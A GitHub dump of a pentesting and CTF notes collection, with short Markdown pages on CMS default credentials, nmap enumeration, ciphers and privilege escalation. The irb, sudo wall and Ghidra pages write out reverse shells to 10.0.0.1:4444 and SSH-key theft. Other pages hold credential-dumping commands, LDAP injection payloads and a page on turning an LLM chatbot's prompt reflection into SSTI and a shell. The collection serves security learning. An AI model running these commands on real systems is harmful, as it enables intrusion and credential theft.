├── CNAME ├── .gitignore ├── docs ├── assets │ ├── icon.png │ └── icon-nobg.png ├── exploit │ ├── web │ │ ├── cms │ │ │ ├── fuel.md │ │ │ ├── concrete.md │ │ │ ├── index.md │ │ │ ├── bolt.md │ │ │ ├── subrion.md │ │ │ ├── mara.md │ │ │ ├── cockpit.md │ │ │ └── typo3.md │ │ ├── xst.md │ │ ├── opencats.md │ │ ├── waf-detection.md │ │ ├── restaurant-management-system.md │ │ ├── limesurvey.md │ │ ├── atlassian-confluence.md │ │ ├── file-upload-attack-on-imagemagick.md │ │ ├── framework │ │ │ ├── apache-struts.md │ │ │ ├── blazor.md │ │ │ ├── angular.md │ │ │ ├── django.md │ │ │ ├── ajp.md │ │ │ ├── tornado.md │ │ │ ├── pickle-rce.md │ │ │ └── spring-cloud.md │ │ ├── llm-chatbot.md │ │ ├── elasticsearch │ │ │ ├── kibana.md │ │ │ └── index.md │ │ ├── browser │ │ │ ├── extract-web-browser-passwords.md │ │ │ └── firefox.md │ │ ├── sql-injection.md │ │ ├── http-header-injection.md │ │ ├── erb-ssti.md │ │ ├── php-rce-cheat-sheet.md │ │ ├── tool │ │ │ ├── socks-proxy-in-burpsuite.md │ │ │ ├── burpsuite-troubleshooting.md │ │ │ └── add-custom-http-headers.md │ │ ├── wkhtmltopdf-ssrf.md │ │ ├── insecure-deserialization.md │ │ ├── webmin.md │ │ ├── codiad.md │ │ ├── host-header-attack.md │ │ ├── http-rate-limit-bypass.md │ │ ├── template-engine │ │ │ └── jsrender-template-injection.md │ │ ├── dom-cloberring.md │ │ ├── apache-activemq.md │ │ ├── code-deobfuscation.md │ │ ├── cacti.md │ │ ├── cgi.md │ │ ├── jenkins.md │ │ ├── jboss.md │ │ ├── webdav.md │ │ ├── bookmarklet.md │ │ ├── session-fixation.md │ │ ├── idor-attack.md │ │ ├── clipbucket.md │ │ ├── latex-injection.md │ │ ├── ghostscript.md │ │ ├── business-logic-attack.md │ │ ├── client-server-side-filter-bypass.md │ │ ├── ssti.md │ │ ├── web-server-misconfiguration.md │ │ ├── apache-zeppelin.md │ │ ├── broken-link-hijacking.md │ │ ├── php-filters-chain.md │ │ ├── webanno.md │ │ ├── microsoft-exchange-server.md │ │ ├── open-redirect.md │ │ ├── file-upload-attack-on-exiftool.md │ │ ├── go-ssti.md │ │ ├── cookie-hijacking.md │ │ ├── php-srand-time-guessing.md │ │ ├── tiny-file-manager.md │ │ ├── php-hash_hmac_bypass.md │ │ └── dump-git-repository-from-website.md │ ├── backup │ │ └── borg.md │ ├── network │ │ ├── protocol │ │ │ ├── dhcp.md │ │ │ ├── modbus.md │ │ │ ├── waste.md │ │ │ ├── irc.md │ │ │ ├── upnp.md │ │ │ ├── pptp.md │ │ │ ├── tftp.md │ │ │ ├── memcache.md │ │ │ ├── telnet.md │ │ │ ├── ntp.md │ │ │ ├── rtsp.md │ │ │ ├── snmp.md │ │ │ ├── vnc.md │ │ │ └── amqp.md │ │ ├── ethernetip.md │ │ ├── tool │ │ │ ├── decrypt-solarputty-sessions-files.md │ │ │ ├── tshark.md │ │ │ └── convert-putty-key-to-openssh-key.md │ │ ├── vpn │ │ │ └── ipsec-vpn.md │ │ ├── grpc.md │ │ ├── wifi │ │ │ └── wifi-password-recovery.md │ │ ├── shell │ │ │ ├── reverse-shell-using-pwncat.md │ │ │ ├── fully-interactive-tty.md │ │ │ └── reverse-shell-using-metasploit.md │ │ ├── port-forwarding │ │ │ └── plink.md │ │ ├── arp-spoofing.md │ │ ├── firewall.md │ │ ├── redos.md │ │ └── fastcgi.md │ ├── cryptography │ │ ├── algorithm │ │ │ ├── atbash-cipher.md │ │ │ ├── rot13-rot47.md │ │ │ ├── pkcs.md │ │ │ ├── pgp.md │ │ │ ├── kerberos-tgt-cracking.md │ │ │ ├── kdbx-files.md │ │ │ ├── ansible-vault-secret.md │ │ │ ├── aes-cbc-padding-oracle-attack.md │ │ │ ├── rpng-guessing.md │ │ │ ├── sha1-hash-collision-attack.md │ │ │ └── des.md │ │ ├── math │ │ │ ├── modular-congruence.md │ │ │ ├── exponentiation.md │ │ │ ├── quadratic-residue.md │ │ │ └── chinese-remainder-theorem.md │ │ ├── key-derivation-functions │ │ │ ├── scrypt.md │ │ │ └── bcrypt.md │ │ └── tool │ │ │ └── pwsafe.md │ ├── hardware │ │ ├── gerber-files.md │ │ ├── netgear.md │ │ ├── sal-logic-analysis.md │ │ └── firmware-analysis.md │ ├── linux │ │ ├── privilege-escalation │ │ │ ├── irb.md │ │ │ ├── sssd.md │ │ │ ├── sudo │ │ │ │ ├── wall.md │ │ │ │ ├── screen.md │ │ │ │ ├── umount.md │ │ │ │ ├── sudoedit.md │ │ │ │ ├── path-traversal.md │ │ │ │ ├── java.md │ │ │ │ ├── shutdown-poweroff.md │ │ │ │ ├── fail2ban-command.md │ │ │ │ ├── tee.md │ │ │ │ ├── vim.md │ │ │ │ ├── clamav.md │ │ │ │ ├── reboot.md │ │ │ │ ├── openvpn.md │ │ │ │ ├── curl.md │ │ │ │ └── dstat.md │ │ │ ├── gnuplot.md │ │ │ ├── doas.md │ │ │ ├── rust.md │ │ │ ├── python-eval.md │ │ │ ├── shared-library-hijacking.md │ │ │ ├── apache-conf.md │ │ │ ├── updated-motd.md │ │ │ ├── ruby.md │ │ │ ├── tar-wildcard.md │ │ │ ├── python-jails-escape.md │ │ │ ├── python-yaml.md │ │ │ └── chrome-remote-debugger.md │ │ ├── x11.md │ │ ├── ghidra-debug-mode-rce.md │ │ ├── post-exploitation │ │ │ └── cover-your-tracks.md │ │ └── forkbomb.md │ ├── dns │ │ └── mdns.md │ ├── windows │ │ ├── active-directory │ │ │ ├── netlogon-elevasion.md │ │ │ ├── ldap-injection.md │ │ │ ├── asrep-roasting.md │ │ │ └── constrained-delegation-attack.md │ │ ├── privilege-escalation │ │ │ ├── dumping-credentials-.md │ │ │ ├── switch-user.md │ │ │ ├── login-windows-shell.md │ │ │ ├── spn-jacking.md │ │ │ ├── manageengine-adselfservice-plus.md │ │ │ └── dumping-windows-password-hashes.md │ │ ├── forensics │ │ │ └── onedrive-logs.md │ │ └── wsl.md │ ├── audio │ │ ├── sstv.md │ │ └── spectrogram.md │ ├── blockchain │ │ ├── smart-contract │ │ │ ├── solidity-overflow-and-underflow.md │ │ │ ├── self-destruct-attack.md │ │ │ ├── contract-address-recovery.md │ │ │ ├── denial-of-service-attack.md │ │ │ ├── index.md │ │ │ └── solidity-assembly.md │ │ └── ethereum │ │ │ └── python.md │ ├── game │ │ ├── minecraft-server.md │ │ ├── chess-game-cheating.md │ │ └── webassembly-games-hacking.md │ ├── archives │ │ ├── rar.md │ │ ├── tar.md │ │ ├── 7z-password-cracking.md │ │ └── zip-unzip.md │ ├── steganography │ │ └── morse-ocr.md │ ├── virtual-machine │ │ └── vm-escape.md │ ├── machine-learning │ │ ├── data-processing │ │ │ ├── data-visualization.md │ │ │ ├── dimensionality-reduction.md │ │ │ └── cluster-analysis.md │ │ ├── model │ │ │ └── pickle-code-injection.md │ │ ├── read-pt.md │ │ ├── computer-vision │ │ │ ├── image-recognition-bypass.md │ │ │ ├── image-manipulation.md │ │ │ └── image-analysis.md │ │ ├── orange-data-mining.md │ │ └── read-hdf5.md │ ├── email │ │ ├── imap.md │ │ └── pop.md │ ├── database │ │ ├── sqlite.md │ │ └── couchdb.md │ ├── version-control │ │ └── git │ │ │ └── gogs.md │ ├── container │ │ └── docker │ │ │ ├── docker-registry.md │ │ │ └── moby-docker-engine-privilege-escalation.md │ ├── printer │ │ ├── raw-printing.md │ │ └── ipp.md │ ├── cloud │ │ ├── gcp.md │ │ └── azure.md │ └── reconnaissance │ │ ├── osint │ │ ├── imint-geoint.md │ │ └── github-dorks.md │ │ └── subdomain │ │ └── subdomain-discovery.md └── disclaimer.md ├── requirements.txt ├── mkdocs.yml ├── .github └── workflows │ └── ci.yml └── LICENSE /CNAME: -------------------------------------------------------------------------------- 1 | exploit-notes.hdks.org -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .cache/ 2 | .vscode/ 3 | .venv/ 4 | 5 | site/ -------------------------------------------------------------------------------- /docs/assets/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/HEAD/docs/assets/icon.png -------------------------------------------------------------------------------- /docs/assets/icon-nobg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/HEAD/docs/assets/icon-nobg.png -------------------------------------------------------------------------------- /docs/exploit/web/cms/fuel.md: -------------------------------------------------------------------------------- 1 | # FUEL CMS Pentesting 2 | 3 | FUEL is a content management system (CMS). 4 | 5 | ## Default Credential 6 | 7 | ```txt 8 | admin:admin 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/cms/concrete.md: -------------------------------------------------------------------------------- 1 | # Concrete CMS Pentesting 2 | 3 | Concrete CMS is a content management system for publishing contents. 4 | 5 | ## Default Credentials 6 | 7 | The default username is **“admin”** in Concrete5. -------------------------------------------------------------------------------- /docs/exploit/backup/borg.md: -------------------------------------------------------------------------------- 1 | # BorgBackup Pentesting 2 | 3 | A deduplicating backup program. 4 | 5 | ## Extract Archives 6 | 7 | ```sh 8 | borg extract /path/to/archive:: 9 | Enter passphrase: 10 | ``` 11 | -------------------------------------------------------------------------------- /docs/exploit/web/xst.md: -------------------------------------------------------------------------------- 1 | # XST (Cross-Site Tracing) 2 | 3 | XST is a network security vulnerability exploiting the HTTP TRACE method. 4 | 5 | ## Add Cookie Header 6 | 7 | ```sh 8 | TRACE / HTTP/1.1 9 | ... 10 | Cookie: name=value 11 | ... 12 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/dhcp.md: -------------------------------------------------------------------------------- 1 | # DHCP (Dynamic Host Configuration Protocol) Pentesting 2 | 3 | DHCP uses UDP. Port 67 is for a server, port 68 is for a client. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap -sU --script broadcast-dhcp-discover -p 67,68 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/modbus.md: -------------------------------------------------------------------------------- 1 | # Modbus Pentesting 2 | 3 | Modbus is a data communications protocol. A default port is 502. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/waste.md: -------------------------------------------------------------------------------- 1 | # WASTE Pentesting 2 | 3 | A peer-to-peer and end-to-end protocol and software application. The ports often used are 1337, 31337. 4 | 5 | ## Connect 6 | 7 | ```sh 8 | connect 1337 9 | # or 10 | nc 1337 11 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/atbash-cipher.md: -------------------------------------------------------------------------------- 1 | # Atbash Cipher 2 | 3 | Atbash Cipher is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet. 4 | 5 | ## Online Tools 6 | 7 | - **[Atbach Cipher Tool](https://www.boxentriq.com/code-breaking/atbash-cipher)** 8 | -------------------------------------------------------------------------------- /docs/exploit/network/ethernetip.md: -------------------------------------------------------------------------------- 1 | # EthernetIP Pentesting 2 | 3 | EtherNet/IP is an industrial network protocol that adopts the Common Industrial Protocol to standart Ethernet. A default port is 44818. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script enip-info -p 44818 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/hardware/gerber-files.md: -------------------------------------------------------------------------------- 1 | # Gerber (GBR) Files 2 | 3 | The Gerber format is an ASCII, vector format for printed circuit board (PCB) designs. 4 | 5 | ## Gerber Viewer 6 | 7 | There are many online tools to view GBR file. 8 | 9 | - [Online Gerber Viewer](https://www.pcbway.com/project/OnlineGerberViewer.html) -------------------------------------------------------------------------------- /docs/exploit/network/tool/decrypt-solarputty-sessions-files.md: -------------------------------------------------------------------------------- 1 | # Decrypt SolarPuTTY Sessions Files 2 | 3 | ## Decrypt 4 | 5 | Python code is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5) 6 | 7 | ```sh 8 | python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/irc.md: -------------------------------------------------------------------------------- 1 | # IRC (Internet Relay Chat) Pentesting 2 | 3 | IRC is a protocol that allows the communication in the form of text between multiple parties. Default ports are 194,6667. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/opencats.md: -------------------------------------------------------------------------------- 1 | # OpenCATS Pentesting 2 | 3 | OpenCATS is an Applicant Tracking System designed for Recruiters to manage recruiting process from job posting, candidate application, through to candidate selection and submission. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:admin 9 | admin:cats 10 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/irb.md: -------------------------------------------------------------------------------- 1 | # irb (Interactive Ruby Shell) Privilege Escalation 2 | 3 | ## Exploitation 4 | 5 | ```bash 6 | irb 7 | 8 | # #q!: Define a string literal 9 | > exec %q!whoami! 10 | > exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash! 11 | > exec %q!bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"! 12 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/x11.md: -------------------------------------------------------------------------------- 1 | # X11 (X Window System) Pentesting 2 | 3 | X Window System is a windowing system for bitmap displays, common on Unix-like operating systems. Default ports are 6000, 6001. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script x11-access -p 6000 9 | 10 | msf> use auxiliary/scanner/x11/open_x11 11 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/waf-detection.md: -------------------------------------------------------------------------------- 1 | # WAF (Web Application Firewall) Detection 2 | 3 | WAF (Web Application Firewall) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service. 4 | 5 | ## Automation 6 | 7 | ```bash 8 | nmap --script=http-waf-fingerprint example.com 9 | 10 | wafw00f https://example.com 11 | ``` -------------------------------------------------------------------------------- /docs/exploit/hardware/netgear.md: -------------------------------------------------------------------------------- 1 | # NETGEAR Pentesting 2 | 3 | NETGEAR produces networking hardware for consumers, businesses, and service providers. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 9 | ``` 10 | 11 | ## Default Credentials 12 | 13 | ```txt 14 | admin:password 15 | ``` -------------------------------------------------------------------------------- /docs/exploit/dns/mdns.md: -------------------------------------------------------------------------------- 1 | # mDNS (Multicast DNS) Pentesting 2 | 3 | description: Multicast DNS protocol resolves hostnames to IP addresses within small networks that do not include a local name server. It is a zero-configuration (zeroconf) service. It uses UDP. A default port is 5353. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap -sU --script dns-service-discovery -p 5353 9 | ``` -------------------------------------------------------------------------------- /docs/exploit/windows/active-directory/netlogon-elevasion.md: -------------------------------------------------------------------------------- 1 | # Netlogon Elevasion 2 | 3 | It is a vulnerability to elevate of privilege in Windows Netlogon using the Netlogon Remote Protocol (MS-NRPC). It’s called Zerologon (CVE-2020-1472). 4 | 5 | ## Exploitation 6 | 7 | There is a lot of Poc in online. 8 | Here, we’ll use [this repository](https://github.com/dirkjanm/CVE-2020-1472) from GitHub. -------------------------------------------------------------------------------- /docs/exploit/audio/sstv.md: -------------------------------------------------------------------------------- 1 | # SSTV (Slow-scan Television) 2 | 3 | SSTV is a picture transmission method by amateur radio operators. We can extract pictures from audio files. 4 | 5 | ## Decode SSTV 6 | 7 | There are some online tools available as below. 8 | 9 | - **MMSSTV** (for Windows) 10 | - **QSSTV** (for Linux) 11 | - **[sstv](https://github.com/colaclanth/sstv)** (Command-line tool) 12 | -------------------------------------------------------------------------------- /docs/exploit/web/restaurant-management-system.md: -------------------------------------------------------------------------------- 1 | # Restaurant Management System (RMS) Pentesting 2 | 3 | ## Remote Code Execution (RCE) v1.0 4 | 5 | See the [Exploit-DB](https://www.exploit-db.com/exploits/47520) for details. 6 | 7 | ```bash 8 | python3 rms-rce.py https://example.com/rms/ 9 | ``` 10 | 11 | When uploading successfully, we can access to https://example.com/rms/images/reverse-shell.php?cmd=id -------------------------------------------------------------------------------- /docs/exploit/web/limesurvey.md: -------------------------------------------------------------------------------- 1 | # LimeSurvey Pentesting 2 | 3 | LimeSurvey is a statistical servey web app written in PHP based on MySQL, SQLite, PostgreSQL or MSSQL database. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:password 9 | ``` 10 | 11 | ## Remote Code Execution (RCE) version < 3.16 12 | 13 | Reference: [https://www.exploit-db.com/exploits/46634](https://www.exploit-db.com/exploits/46634) -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/solidity-overflow-and-underflow.md: -------------------------------------------------------------------------------- 1 | # Solidity Overflow & Underflow 2 | 3 | Solidity is vulnerable to overflow and underflow of uint variables on the version <0.8. 4 | 5 | ## Overflow 6 | 7 | ```js 8 | uint8 value = 255; 9 | value++; 10 | // Result: value = 0 11 | ``` 12 | 13 | ## Underflow 14 | 15 | ```js 16 | uint8 value = 0; 17 | value--; 18 | // Result: value = 255 19 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/atlassian-confluence.md: -------------------------------------------------------------------------------- 1 | # Atlassian Confluence Pentesting 2 | 3 | Atlassian Confluence is a collaboration wiki tool used to help teams to collaborate and share knowledge efficiently. 4 | 5 | ## Remote Code Execution (CVE-2022-26134) 6 | 7 | Download the exploit from the [repo](https://github.com/h3v0x/CVE-2022-26134). 8 | 9 | ```sh 10 | python3 exploit.py -u http:// -c whoami 11 | ``` 12 | -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/rot13-rot47.md: -------------------------------------------------------------------------------- 1 | # ROT13, ROT47 2 | 3 | ROT13 (rotate by 13 places), ROT47 (rotate by 47 places) are simple letter substitution ciphers. 4 | 5 | ## Decode 6 | 7 | **[CyberChef](https://gchq.github.io/CyberChef/)** is useful online tools to decode ROT13, ROT47. 8 | 9 |
10 | 11 | ## Encode 12 | 13 | ### ROT13 14 | 15 | ```sh 16 | echo hello | tr 'A-Za-z' 'N-ZA-Mn-za-m' 17 | ``` -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/dumping-credentials-.md: -------------------------------------------------------------------------------- 1 | # Dumping Credentials via keymgr.dll 2 | 3 | The keymgr.dll extracts all credentials on host. 4 | 5 | ## Dump 6 | 7 | ```sh 8 | rundll32 keymgr.dll, KRShowKeyMgr 9 | ``` 10 | 11 | ## References 12 | 13 | - [Vx Underground](https://samples.vx-underground.org/Papers/Windows/Data%20Theft/2022-04-19%20-%20Dumping%20passwords%20using%20KRShowKeyMgr.PNG) 14 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sssd.md: -------------------------------------------------------------------------------- 1 | # SSSD Privilege Escalation 2 | 3 | SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms. 4 | 5 | ## Find Credentials 6 | 7 | ```bash 8 | ls -la /var/lib/sss/ 9 | 10 | # Find credentials 11 | # If we find the hash, crack it using John or Hashcat. 12 | strings /var/lib/sss/db/example.ldb 13 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/upnp.md: -------------------------------------------------------------------------------- 1 | # UPnP (Universal Plug and Play) Pentesting 2 | 3 | UPnP is a network protocol that allow devices to discover and interact with each other seamlessly over a local network. Default ports are 1900(UDP) and 5000 (TCP). 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap -sU --script upnp-info -p 1900 9 | nmap --script upnp-info -p 5000 10 | nmap --script broadcast-upnp-info -p 1900 11 | ``` -------------------------------------------------------------------------------- /docs/exploit/game/minecraft-server.md: -------------------------------------------------------------------------------- 1 | # Minecraft Server Pentesting 2 | 3 | A Minecraft server is a player-owned or business-owned multiplayer game server. A default port is 25565. 4 | 5 | ## Run a Server 6 | 7 | ```bash 8 | # Create the screen session 9 | screen -C 10 | 11 | # Reattach to the session 12 | screen -r 13 | ``` 14 | 15 | ## Commands in the Server 16 | 17 | ```bash 18 | # Print usage 19 | help 20 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/pptp.md: -------------------------------------------------------------------------------- 1 | # PPTP Pentesting 2 | 3 | PPTP is one of the first VPN protocols. It relies on the MPPE (Microsoft Point-to-Point Encryption) protocol. A default port is 1723. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script pptp-version -p 1723 9 | ``` 10 | 11 | ## References 12 | 13 | - [Common VPN Vulnerabilities and Exploits](https://www.linkedin.com/pulse/common-vpn-vulnerabilities-exploits-abed-a-a-) -------------------------------------------------------------------------------- /docs/exploit/archives/rar.md: -------------------------------------------------------------------------------- 1 | RAR (Roshal Archive) 2 | 3 | RAR is a proprietary archive file format that supports data compression, error correction and file spanning. 4 | 5 | ## Decrypt 6 | 7 | First of all, you need to format the RAR file to make the John to recognize it. 8 | 9 | ```sh 10 | rar2john example.rar > hash.txt 11 | ``` 12 | 13 | Crack the password using the formatted text. 14 | 15 | ```sh 16 | john --wordlist=wordlist.txt hash.txt 17 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/pkcs.md: -------------------------------------------------------------------------------- 1 | # PKCS (Public-Key Cryptography Standards) 2 | PKCS are a group of public-key cryptography standards. 3 | 4 | ## Decrypt 5 | 6 | ### PKCS#12 7 | 8 | First of all, you need to format the PKCS file to make the John to recognize it. 9 | 10 | ```sh 11 | pfx2john example.pfx > hash.txt 12 | ``` 13 | 14 | Crack the password using the formatted text. 15 | 16 | ```sh 17 | john --wordlist=wordlist.txt hash.txt 18 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/cms/index.md: -------------------------------------------------------------------------------- 1 | # CMS (Content Management System) Pentesting 2 | 3 | CMS (Content Management System) is computer software used to manage the creation and modification of digital content. 4 | 5 | ## CMS Detection 6 | 7 | If you don't know which CMS used in target websites, you can detect it using **[Cmseek](https://github.com/Tuhinshubhra/CMSeeK)** which is an automatic CMS detection tool. 8 | 9 | ```sh 10 | cmseek -u vulnerable.com 11 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/cms/bolt.md: -------------------------------------------------------------------------------- 1 | # Bolt CMS Pentesting 2 | 3 | Bolt is an open-source content managemtn system based on PHP. 4 | 5 | ## Login Page 6 | 7 | ```sh 8 | /bolt 9 | ``` 10 | 11 | ## Remote Code Execution (v3.7.1) 12 | 13 | ```sh 14 | msfconsole 15 | msf> use exploit/unix/webapp/bolt_authenticated_rce 16 | msf> set lhost 17 | msf> set rhosts 18 | msf> set username 19 | msf> set password 20 | msf> run 21 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/file-upload-attack-on-imagemagick.md: -------------------------------------------------------------------------------- 1 | # File Upload Attack on ImageMagick 2 | 3 | If website uses ImageMagick to analyze or modify uploaded images, we might be able to execute remote code. 4 | 5 | This page is no content yet, but please refer to the references below to achieve this attack. 6 | 7 | ## References 8 | 9 | - [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Picture%20ImageMagick) -------------------------------------------------------------------------------- /docs/exploit/network/protocol/tftp.md: -------------------------------------------------------------------------------- 1 | # TFTP (Trivial File Transfer Protocol) Pentesting 2 | 3 | TFTP is a simple lockstep file transfer protocol which allows a client to get a file from or put a file onto a remote host. It uses UDP. A default port is 69. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap -sU --script tftp-enum -p 69 9 | ``` 10 | 11 | ## Configuration Files 12 | 13 | ```bash 14 | cat /etc/inetd.conf 15 | # or 16 | cat /etc/xinetd.d/tftp 17 | ``` -------------------------------------------------------------------------------- /docs/exploit/steganography/morse-ocr.md: -------------------------------------------------------------------------------- 1 | # Morse OCR 2 | 3 | If a picture is morse code, we can read it and translate to human readable strings. 4 | 5 | ## Morse OCR 6 | 7 | [morse-ocr](https://github.com/eauxfolles/morse-ocr) is an useful Python script to read and translate morse code from picture. 8 | 9 | ```bash 10 | python3 mocr.py example.png 11 | ``` 12 | 13 | ## References 14 | 15 | - [Wikimedia](https://commons.wikimedia.org/wiki/File:International_Morse_Code.PNG) -------------------------------------------------------------------------------- /docs/exploit/web/framework/apache-struts.md: -------------------------------------------------------------------------------- 1 | # Apache Struts Pentesting 2 | 3 | An open-source web application framework for developing Java EE web applications. 4 | 5 | ## Struts2 OGNL Elavasion 6 | 7 | Metasploit is useful for exploiting. 8 | 9 | ```sh 10 | msfconsole 11 | msf > use multi/http/struts2_content_type_ognl 12 | msf > set payload linux/x86/meterpreter/reverse_tcp 13 | msf > exploit 14 | 15 | meterpreter > shell 16 | SHELL=/bin/bash script -q /dev/null 17 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/llm-chatbot.md: -------------------------------------------------------------------------------- 1 | # LLM Chatbot Pentesting 2 | 3 | An LLM chatbot in a web application can be abused with some exploit techniques. 4 | 5 | ## SSTI 6 | 7 | If the chatbot reflects our prompt in the response, we might be able to abuse it with SSTI. For example, 8 | 9 | ```txt 10 | Prompt: How are you? {{ 2*3 }} 11 | 12 | Response: I will answer your question "How are you? 6". I'm good, thanks! How about you? 13 | ``` 14 | 15 | If it works, we can achieve reverse shell. -------------------------------------------------------------------------------- /docs/exploit/network/vpn/ipsec-vpn.md: -------------------------------------------------------------------------------- 1 | # IPsec VPN Pentesting 2 | 3 | IPsec (Internet Protocol Security) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in VPN (Virtual Private Network). Default ports are 443 (SSL), 500 (IPSec). 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script http-cisco-anyconnect -p 443 9 | nmap --script ike-version -p 500 10 | ``` -------------------------------------------------------------------------------- /docs/exploit/windows/active-directory/ldap-injection.md: -------------------------------------------------------------------------------- 1 | # LDAP Injection 2 | 3 | LDAP may be vulnerable to query injection if website does not properly validate user input. 4 | 5 | ## Basic Payloads 6 | 7 | ```bash 8 | (&uid=*)(userPassword=*) 9 | (&uid=*)|(userPassword=*) 10 | (&uid=*)|(objectClass=*)(userPassword=password123) 11 | 12 | *)(uid=*))(|(password=*) 13 | ``` 14 | 15 | ## References 16 | 17 | - [InfoSec Writeups](https://infosecwriteups.com/for-newbies-simple-examples-of-ldap-injection-vulnerabilities-cbf231431923) -------------------------------------------------------------------------------- /docs/exploit/cryptography/math/modular-congruence.md: -------------------------------------------------------------------------------- 1 | # Modular Congruence 2 | 3 | ## Basic 4 | 5 | In modular congruence, the following rules apply: 6 | 7 | ```txt 8 | If `a ≡ b mod c`, then `b ≡ a mod c` 9 | ``` 10 | 11 | So if we have the following problem, 12 | 13 | ```python 14 | 39 ≡ x mod 8 15 | ``` 16 | 17 | To find **`x`** value, we can calculate it as below using Python. 18 | 19 | ```python 20 | x = 39 % 8 21 | print(x) 22 | ``` 23 | 24 | ## References 25 | 26 | - [CryptoHack](https://cryptohack.org/courses/modular/ma0/) 27 | -------------------------------------------------------------------------------- /docs/exploit/virtual-machine/vm-escape.md: -------------------------------------------------------------------------------- 1 | # VM (Virtual Machine) Escape 2 | 3 | ## Shared Folder 4 | 5 | If the VM admin sets a folder containing sensitive files as Shared Folder, we can get sensitive information by getting into the folder. 6 | 7 | ### VirtualBox 8 | 9 | ```bash 10 | # Linux 11 | cd /media/sf_ 12 | 13 | # Windows 14 | cd \\VBOXSVR\\ 15 | ``` 16 | 17 | ### VMWare 18 | 19 | ```bash 20 | # Linux 21 | cd /mnt/vmhgs/ 22 | 23 | # Windows 24 | cd \\vmware-host\Shared Folder\ 25 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/wall.md: -------------------------------------------------------------------------------- 1 | # Sudo Wall Privilege Escalation 2 | 3 | The `wall` command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (ALL) NOPASSWD: wall 11 | ``` 12 | 13 | ## Exploitation 14 | 15 | ```sh 16 | # Reverse shell 17 | sudo wall "$(bash -c 'bash -i >& /dev/tcp// 0>&1')" 18 | 19 | # Gets a SSH private key of another user 20 | sudo wall "$(cat /home/user/.ssh/id_rsa)" 21 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/self-destruct-attack.md: -------------------------------------------------------------------------------- 1 | # Self Destruct Attack 2 | 3 | Solidity’s ‘selfdestruct’ function may be used to destruct a target contract and steal the balance by an attacker. 4 | 5 | ## Create a Malicious Contract for Destructing Contract 6 | 7 | ```js 8 | // SPDX-License-Identifier: MIT 9 | pragma solidity ^0.4.0; 10 | 11 | contract Attack { 12 | function attack(address _address) payable public { 13 | // the remaining Ether sent to _address when destructing 14 | selfdestruct(_address); 15 | } 16 | } 17 | ``` 18 | -------------------------------------------------------------------------------- /docs/exploit/linux/ghidra-debug-mode-rce.md: -------------------------------------------------------------------------------- 1 | # Ghidra Debug Mode RCE 2 | 3 | ## Exploitation 4 | 5 | ```bash 6 | jdb -attach 127.0.0.1:18001 7 | > classpath 8 | > classes 9 | Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run() 10 | Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh") 11 | ``` 12 | 13 | ## References 14 | 15 | - [Ethical Hackers Club](https://www.youtube.com/watch?v=N3VcWIUpgfE) 16 | - 